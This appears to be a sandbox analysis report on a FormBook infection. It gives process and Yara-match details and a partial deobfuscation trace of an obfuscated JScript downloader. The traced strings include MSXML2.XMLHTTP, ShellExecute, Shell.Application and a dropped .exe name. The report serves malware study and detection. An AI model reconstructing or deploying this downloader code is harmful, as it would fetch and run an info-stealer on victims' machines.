                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:moderate

                                                    General

                                                    Target ID:10
                                                    Start time:13:39:26
                                                    Start date:30/01/2023
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff647860000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:11
                                                    Start time:13:39:40
                                                    Start date:30/01/2023
                                                    Path:C:\Windows\SysWOW64\control.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\control.exe
                                                    Imagebase:0x1380000
                                                    File size:114688 bytes
                                                    MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Call Graph

                                                    • Executed
                                                    • Not Executed
                                                    callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C2 clusterC8C2 clusterC10C2 clusterC12C2 clusterC14C2 clusterC16C2 clusterC18C2 clusterC20C0 clusterC22C20 clusterC24C0 clusterC26C24 clusterC28C0 clusterC30C28 clusterC32C0 clusterC34C32 clusterC36C32 clusterC38C32 clusterC40C32 clusterC42C0 clusterC44C42 clusterC46C44 clusterC48C46 clusterC50C46 clusterC52C46 clusterC54C44 clusterC56C54 clusterC58C54 clusterC60C54 clusterC62C44 clusterC64C0 clusterC66C0 clusterC68C0 clusterC70C0 clusterC72C0 clusterC74C72 clusterC76C74 clusterC78C76 clusterC80C76 clusterC82C76 clusterC84C76 clusterC86C76 clusterC88C76 clusterC90C76 clusterC92C74 clusterC94C92 clusterC96C92 clusterC98C92 clusterC100C72 clusterC102C0 clusterC104C0 clusterC106C104 clusterC108C104 clusterC110C104 E1C0 entry:C0 F3C2 E1C0->F3C2 F21C20 _0x560f E1C0->F21C20 F65C64 _0x25c5ce E1C0->F65C64 F67C66 _0x2bbb97 E1C0->F67C66 F69C68 'Open' E1C0->F69C68 F71C70 'Send' E1C0->F71C70 F103C102 _0x296948 E1C0->F103C102 F5C4 _0x1fd6ec F3C2->F5C4 F7C6 parseInt F3C2->F7C6 F9C8 _0x399b45 F3C2->F9C8 F11C10 _0x496a96 F3C2->F11C10 F13C12 'push' F3C2->F13C12 F15C14 'shift' F3C2->F15C14 F17C16 'push' F3C2->F17C16 F19C18 'shift' F3C2->F19C18 F21C20->F21C20 F105C104 _0x1523 F21C20->F105C104 F23C22 F25C24 _0x4251 F25C24->F25C24 F29C28 _0x2a78 F25C24->F29C28 F27C26 F29C28->F29C28 F31C30 F33C32 F33C32->F21C20 F33C32->F25C24 F35C34 _0x596c54 F33C32->F35C34 F37C36 parseInt F33C32->F37C36 F39C38 _0x30b5e5 F33C32->F39C38 F41C40 _0x114d36 F33C32->F41C40 F43C42 _0x9bc2 F43C42->F43C42 F43C42->F105C104 F45C44 F45C44->F25C24 F63C62 _0x2f9df9 F45C44->F63C62 F47C46 F47C46->F25C24 F49C48 _0x243088 F47C46->F49C48 F51C50 'toString' F47C46->F51C50 F53C52 decodeURIComponent F47C46->F53C52 F55C54 F55C54->F25C24 F57C56 _0x30eaf9 F55C54->F57C56 F59C58 'charCodeAt' F55C54->F59C58 F61C60 _0x2f4146 F55C54->F61C60 F73C72 _0x4692 F73C72->F29C28 F73C72->F73C72 F75C74 F101C100 'cPJhTe' F75C74->F101C100 F77C76 F79C78 'charAt' F77C76->F79C78 F81C80 'fromCharCode' F77C76->F81C80 F83C82 'indexOf' F77C76->F83C82 F85C84 'slice' F77C76->F85C84 F87C86 'toString' F77C76->F87C86 F89C88 'charCodeAt' F77C76->F89C88 F91C90 decodeURIComponent F77C76->F91C90 F93C92 F95C94 _0xbfa17e F93C92->F95C94 F97C96 'charCodeAt' F93C92->F97C96 F99C98 'fromCharCode' F93C92->F99C98 F105C104->F105C104 F107C106 _0x3a2755 F105C104->F107C106 F109C108 _0xd71e86 F105C104->F109C108 F111C110

                                                    Script:

                                                    Code
                                                    0
                                                    var _0x296948 = _0x4692, _0x25c5ce = _0x4251;
                                                      1
                                                      ( function (_0x1fd6ec, _0x1eb0be) {
                                                      • (function _0x2a78(),250395) ➔ undefined
                                                      • (function _0x2a78(),250395) ➔ undefined
                                                      2
                                                      var _0x496a96 = _0x4692, _0x399b45 = _0x4251, _0x2663fc = _0x1fd6ec ( );
                                                      • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                      3
                                                      while (! ! [ ] )
                                                        4
                                                        {
                                                          5
                                                          try
                                                            6
                                                            {
                                                              7
                                                              var _0x434d37 = - parseInt ( _0x399b45 ( 0x19e ) ) / 0x1 + - parseInt ( _0x399b45 ( 0x1af ) ) / 0x2 + parseInt ( _0x399b45 ( 0x188 ) ) / 0x3 * ( - parseInt ( _0x399b45 ( 0x185 ) ) / 0x4 ) + - parseInt ( _0x399b45 ( 0x1a3 ) ) / 0x5 + - parseInt ( _0x399b45 ( 0x171 ) ) / 0x6 * ( parseInt ( _0x496a96 ( 0x197, 'Ak^H' ) ) / 0x7 ) + parseInt ( _0x399b45 ( 0x18d ) ) / 0x8 * ( - parseInt ( _0x399b45 ( 0x1ad ) ) / 0x9 ) + parseInt ( _0x496a96 ( 0x18f, '#k&M' ) ) / 0xa * ( parseInt ( _0x399b45 ( 0x175 ) ) / 0xb );
                                                              • _0x4251(414) ➔ "fromCharCode"
                                                              • parseInt("fromCharCode") ➔ NaN
                                                              • _0x4251(431) ➔ "hCktg8kKD8ou"
                                                              • parseInt("hCktg8kKD8ou") ➔ NaN
                                                              • _0x4251(392) ➔ "WQldKJpcNSkZwCohW7uuzCkoW4i"
                                                              • parseInt("WQldKJpcNSkZwCohW7uuzCkoW4i") ➔ NaN
                                                              • _0x4251(389) ➔ "WRCRf8oCW5a"
                                                              • parseInt("WRCRf8oCW5a") ➔ NaN
                                                              • _0x4251(419) ➔ "FnVtWB"
                                                              • parseInt("FnVtWB") ➔ NaN
                                                              • _0x4251(369) ➔ "EmosWRVcNSolFa1ihmofWPhcNa"
                                                              • parseInt("EmosWRVcNSolFa1ihmofWPhcNa") ➔ NaN
                                                              • _0x4692(407,"Ak^H") ➔ "t\x9b\x9dK h\xe8F.O\x1b\x14\xf9f]A\xf3~\xfe\xdd\xeb\x93\xac$"
                                                              • parseInt("t\x9b\x9dK h\xe8F.O\x1b\x14\xf9f]A\xf3~\xfe\xdd\xeb\x93\xac$") ➔ NaN
                                                              • _0x4251(397) ➔ "UGpDBa"
                                                              • parseInt("UGpDBa") ➔ NaN
                                                              • _0x4251(429) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                              • parseInt("W5S9W7KHWQtdJMhdSGpcIKnHWPun") ➔ NaN
                                                              • _0x4692(399,"#k&M") ➔ "7\x11ov\x15\x8c\xf9\xf9#\xe5 \xc9{\x91\x14 Y5k\xb9\x8d\xc9\xbeW\xc3\xb4\xb5\xa45cY>3\xac"
                                                              • parseInt("7\x11ov\x15\x8c\xf9\xf9#\xe5 \xc9{\x91\x14 Y5k\xb9\x8d\xc9\xbeW\xc3\xb4\xb5\xa45cY>3\xac") ➔ 7
                                                              • _0x4251(373) ➔ "push"
                                                              • parseInt("push") ➔ NaN
                                                              • _0x4251(414) ➔ "233387pUFHvh"
                                                              • parseInt("233387pUFHvh") ➔ 233387
                                                              • _0x399b45(431) ➔ "796884wfZlXM"
                                                              • parseInt("796884wfZlXM") ➔ 796884
                                                              • _0x399b45(392) ➔ "368895bdoymb"
                                                              • parseInt("368895bdoymb") ➔ 368895
                                                              • _0x399b45(389) ➔ "4rmKgck"
                                                              • parseInt("4rmKgck") ➔ 4
                                                              • _0x399b45(419) ➔ "1626000eqHoJP"
                                                              • parseInt("1626000eqHoJP") ➔ 1626000
                                                              • _0x399b45(369) ➔ "150UECBKi"
                                                              • parseInt("150UECBKi") ➔ 150
                                                              • _0x4692(407,"Ak^H") ➔ "139783InEZVB"
                                                              • parseInt("139783InEZVB") ➔ 139783
                                                              • _0x399b45(397) ➔ "125536oJLPHF"
                                                              • parseInt("125536oJLPHF") ➔ 125536
                                                              • _0x399b45(429) ➔ "54TmlaBs"
                                                              • parseInt("54TmlaBs") ➔ 54
                                                              • _0x4692(399,"#k&M") ➔ "460SvEvgK"
                                                              • parseInt("460SvEvgK") ➔ 460
                                                              • _0x399b45(373) ➔ "460031zEcYIe"
                                                              • parseInt("460031zEcYIe") ➔ 460031
                                                              8
                                                              if ( _0x434d37 === _0x1eb0be )
                                                                9
                                                                break ;
                                                                  10
                                                                  else
                                                                    11
                                                                    _0x2663fc['push'] ( _0x2663fc['shift'] ( ) );
                                                                      12
                                                                      }
                                                                        13
                                                                        catch ( _0x179bcd )
                                                                          14
                                                                          {
                                                                            15
                                                                            _0x2663fc['push'] ( _0x2663fc['shift'] ( ) );
                                                                              16
                                                                              }
                                                                                17
                                                                                }
                                                                                  18
                                                                                  } ( _0x2a78, 0x3d21b ) );
                                                                                    19
                                                                                    function _0x560f(_0x21316b, _0x2c7673) {
                                                                                    • _0x560f(275) ➔ "aLBcSv8UWRldTmkhoColW54Z"
                                                                                    • _0x560f(261) ➔ "hSkNWP3dMdulzwhcT0e"
                                                                                    • _0x560f(258) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                                                    • _0x560f(262) ➔ "Close"
                                                                                    • _0x560f(279) ➔ "WRCRf8oCW5a"
                                                                                    • _0x560f(259) ➔ "24cwPSlC"
                                                                                    • _0x560f(270) ➔ "gCk/WPVdMa"
                                                                                    • _0x560f(275) ➔ "MSXML2.XMLHTTP"
                                                                                    • _0x560f(261) ➔ "Close"
                                                                                    • _0x560f(275) ➔ "7728888BzvkvV"
                                                                                    20
                                                                                    var _0x152d41 = _0x1523 ( );
                                                                                    • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                    • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                    • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                    • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                    • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                    • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                    • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
                                                                                    • _0x1523() ➔ 536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application,WO41qK7cRvBcISoBWQBcVJxcMW
                                                                                    • _0x1523() ➔ 536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application,WO41qK7cRvBcISoBWQBcVJxcMW
                                                                                    • _0x1523() ➔ ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application,WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV
                                                                                    21
                                                                                    return _0x560f =
                                                                                      22
                                                                                      function (_0x4e7b52, _0x4146f5) {
                                                                                      • _0x560f(275,undefined) ➔ "aLBcSv8UWRldTmkhoColW54Z"
                                                                                      • _0x560f(261,undefined) ➔ "hSkNWP3dMdulzwhcT0e"
                                                                                      • _0x560f(258,undefined) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                                                      • _0x560f(262,undefined) ➔ "Close"
                                                                                      • _0x560f(279,undefined) ➔ "WRCRf8oCW5a"
                                                                                      • _0x560f(259,undefined) ➔ "24cwPSlC"
                                                                                      • _0x560f(270,undefined) ➔ "gCk/WPVdMa"
                                                                                      • _0x560f(275,undefined) ➔ "MSXML2.XMLHTTP"
                                                                                      • _0x560f(261,undefined) ➔ "Close"
                                                                                      • _0x560f(275,undefined) ➔ "7728888BzvkvV"
                                                                                      23
                                                                                      _0x4e7b52 = _0x4e7b52 - 0xfe;
                                                                                        24
                                                                                        var _0x300c1d = _0x152d41[_0x4e7b52];
                                                                                          25
                                                                                          return _0x300c1d;
                                                                                            26
                                                                                            }, _0x560f ( _0x21316b, _0x2c7673 );
                                                                                              27
                                                                                              }
                                                                                                28
                                                                                                var _0x106d34 = _0x560f, _0x2bbb97 = _0x9bc2;
                                                                                                  29
                                                                                                  function _0x4251(_0x5bb6db, _0x386215) {
                                                                                                  • _0x4251(414) ➔ "fromCharCode"
                                                                                                  • _0x4251(431) ➔ "hCktg8kKD8ou"
                                                                                                  • _0x4251(392) ➔ "WQldKJpcNSkZwCohW7uuzCkoW4i"
                                                                                                  • _0x4251(389) ➔ "WRCRf8oCW5a"
                                                                                                  • _0x4251(419) ➔ "FnVtWB"
                                                                                                  • _0x4251(369) ➔ "EmosWRVcNSolFa1ihmofWPhcNa"
                                                                                                  • _0x4251(397) ➔ "UGpDBa"
                                                                                                  • _0x4251(429) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                                                                  • _0x4251(373) ➔ "push"
                                                                                                  • _0x4251(414) ➔ "233387pUFHvh"
                                                                                                  30
                                                                                                  var _0x2a78ae = _0x2a78 ( );
                                                                                                  • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
